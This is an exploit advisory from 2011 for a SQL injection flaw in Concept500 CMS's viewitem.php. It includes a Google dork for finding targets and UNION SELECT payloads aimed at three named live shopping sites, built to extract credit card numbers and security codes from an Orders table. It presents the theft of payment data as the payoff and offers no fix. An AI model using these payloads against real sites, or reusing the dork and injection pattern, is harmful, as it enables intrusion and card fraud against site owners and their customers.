# Exploit Title: Concept500 CMS SQL Injection Vulnerability
# Google Dork: [inurl : inurl:viewItem.php?id= ]
# Date: 2011-07-08
# Author: Sepehr Security Team
# Discovered By: H3X
# Software Site: http://www.concept500.co.uk/
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Expl0it :]
http://www.[sitename].com/viewitem.php?id=[SQL Injection]
[DEMO:]
1 ) http://www.mycommissionbid.com/bid/viewitem.php?id=-487+union+select+1,group_concat%28SecurityNo,0x3a,CardNo%29,3,4,5,6,7,8,9,10,11+from+Orders--
2) http://www.historicflyingclothing.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
3) http://www.hiscoll.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
and more ...
[Note :]
with this vulnerability you can get direct access to payment information same as paypal and other card information on database.
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Spc. Thanks :]
thE_Knight | Einstein | W!z4rd | Naboodgar | CONS7ANTINE | Mr.Amir-Masoud| nImaarek | GrEEn-ErRor | Net.Plus | Cruel
All Sepehr Sceurity Team Members And All Iranian Hack3rs
[Home Page :]
wWw.Sepehr-Team.orG